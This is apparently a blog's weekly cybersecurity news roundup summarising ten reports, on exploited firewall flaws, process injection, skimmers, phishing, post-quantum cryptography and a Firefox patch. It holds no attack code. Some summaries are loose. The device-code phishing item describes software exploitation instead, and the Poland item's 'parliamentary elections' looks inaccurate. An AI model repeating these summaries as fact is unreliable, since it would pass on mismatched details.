CyberWednesday: Top 10 Cybersecurity Updates #17

It's time for another CyberWednesday (Feb. 13-19). Cyber threats are evolving at a rapid pace, so keeping up is more important than ever. From attacks on artificial intelligence systems to the activities of state-sponsored hacking groups, no technology or organization is fully immune. Ransomware is becoming increasingly sophisticated, and security vulnerabilities are being ruthlessly exploited.

1. CISA Adds Palo Alto Networks and SonicWall Flaws to Exploited Vulnerabilities List

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two security vulnerabilities affecting Palo Alto Networks PAN-OS and SonicWall SonicOS SSLVPN to its Known Exploited Vulnerabilities (KEV) catalog, indicating active exploitation. The first, CVE-2025-0108, is an authentication bypass flaw in the PAN-OS management web interface that allows unauthenticated attackers to invoke specific PHP scripts.

Palo Alto Networks has observed attempts to exploit this vulnerability in combination with others, such as CVE-2024-9474, to gain unauthorized access to unpatched firewalls. The second, CVE-2024-53704, is an improper authentication issue in SonicWall's SSLVPN, enabling remote attackers to bypass authentication. Following the release of a proof-of-concept by Bishop Fox, threat actors have been actively exploiting this flaw. CISA has mandated that Federal Civilian Executive Branch agencies address these vulnerabilities by March 11, 2025, to protect their networks. (Source: thehackernews.com)

2. Chinese Hackers Exploit MAVInject.exe to Evade Detection in Targeted Cyber Attacks

Chinese threat actors have leveraged the mavinject.exe tool to compromise targeted systems and bypass traditional security measures. The hackers utilize this executable to inject malicious code into trusted processes, making their operations more stealthy. Security researchers have observed that this tactic allows the threat group to maintain persistence and evade detection across various networks.

Investigations indicate that the exploitation of mavinject.exe is part of a broader campaign aimed at infiltrating sensitive environments. Experts warn that organizations must update their security protocols and patch vulnerabilities to mitigate such advanced threats. The evolving nature of these attacks underscores the importance of robust cybersecurity practices in defending against state-sponsored operations. (Source: thehackernews.com)

3. Debunking the AI Hype: Inside Real Hacker Tactics

The actual application of artificial intelligence in cyber security is more complicated than media reports suggest. While AI can support threat detection, it does not replace the need for human analysis and expert experience. Machine learning technologies support the analysis of large data sets, but still require oversight to avoid unexpected risks. Hackers are also using manipulation techniques, such as phishing, to gain access to systems whose security is not based solely on artificial intelligence.

There is a danger of dependence on this technology, which can lead to new security vulnerabilities as adversaries also adapt their methods. The need to strike a balance between innovation and traditional protection methods is crucial in the fight against modern threats. (Source: thehackernews.com)

4. Cybercriminals Exploit Onerror Event in Image Tags to Deploy Payment Skimmers

Cybercriminals use the onerror event in HTML to inject malicious code when resource loading errors occur. By manipulating this event, they can bypass traditional protection mechanisms and launch XSS attacks. This technique allows them to gain unauthorized access to data or make unwanted changes to online applications. The use of less obvious methods, such as onerror modification, makes the threat more difficult to detect. Proper validation and sanitization of data is essential to minimize the risk. Regular security updates are key in the fight against such attacks. (Source: thehackernews.com)

5. Microsoft: Russian-Linked Hackers Using 'Device Code Phishing' to Hijack Accounts

Microsoft has reported that Russian-linked hackers are using advanced techniques to break into company systems. Attackers are exploiting vulnerabilities in software, allowing them to escalate privileges and install malicious code. These methods bypass traditional security measures, increasing the risk of unauthorized access to sensitive data. Experts stress the need to quickly implement patches and strengthen security procedures.

Organizations are being warned of the growing risk of state cyberattacks. The incident underscores the importance of continuous threat monitoring and investment in modern protection solutions. (Source: thehackernews.com)

6. Call for action: urgent plan needed to transition to post-quantum cryptography together

Europol is calling for an urgent, comprehensive plan to transition to cryptography resistant to quantum attacks. With the rapid development of quantum computers, traditional encryption methods are becoming increasingly threatened. Cooperation between countries, industry and academia is crucial for a successful technological transition.

New standards aim to secure critical infrastructure and protect data in both the public and private sectors. Intensified research and rapid technology transfer are the cornerstones of efforts to maintain the highest level of digital security. (Source: europol.europa.eu)

7. New Wave of ‘Scam-Yourself’ Attacks Utilizing AI-Generated Videos With DeepFake

A new wave of “scam yourself” attacks is becoming increasingly prominent in the digital environment. Cybercriminals are using sophisticated social engineering techniques to get victims to take actions that unwittingly harm their own interests. Information manipulation and false messages often make victims believe they are acting to their own advantage, when in fact they are being duped.

Such actions can lead to serious financial losses and leakage of confidential data. Experts stress that it is crucial to increase awareness of the risks and use advanced security measures to protect against such scams. (Source: cybersecuritynews.com)

8. How Cybersecurity is Fuelling Global IT and Tech Spend

Growing cyber threats are contributing to a rapid increase in global IT spending. Organizations are investing more and more resources in state-of-the-art protection systems to guard against increasingly sophisticated attacks. The increase in spending on cyber security is fueling the development of innovative tools and technologies to effectively counter threats.

Strengthening IT infrastructure is becoming a key component of companies' strategies to not only protect data, but also to remain competitive in the market. Experts predict that this trend will continue, transforming global IT budgets and accelerating digital transformation. Investment in digital security is seen as an indispensable step in building resilience against cyber attacks and supporting the continued growth of the technology sector. (Source: cybermagazine.com)

9. Firefox 135.0.1 Released with Fix for High-Severity Memory Safety Vulnerabilities

Mozilla has released Firefox update 135.0.1, which fixes critical security vulnerability CVE-2025-1414. The bug involved memory management during HTML content processing and could allow attackers to execute code remotely. In addition to security improvements, responsiveness issues with drop-down menus, scrolling errors related to anchor tags and crashes when restoring sessions have also been fixed. It is recommended that you update your browser immediately to avoid potential threats. (Source: cybersecuritynews.com)

10. Massive attacks on Europe. Poland's elections could be at risk?

The article looks at the surge in cyber attacks in Europe, with a focus on Poland. In 2024, the number of global cyberattacks increased by 44%, with organizations in the EMEA region experiencing an average of 1,679 attacks per week. Poland was among the top European countries with 1,644 attacks per week, with public, government and military sectors particularly vulnerable.

Check Point Software experts, at the CPX 2025 conference in Vienna, highlighted that Poland has been the target of nearly 100,000 hacking attacks since the Russian invasion of Ukraine in 2022. With Poland's upcoming parliamentary elections, there is a real threat of interference in the electoral process through cyberattacks and disinformation campaigns, which could affect the stability of the country's democratic processes. (Source: bussinesjournal.pl)

Let's stay in touch! Follow our site so you don't miss the latest cyber security updates! Need expert advice? Get in touch with us!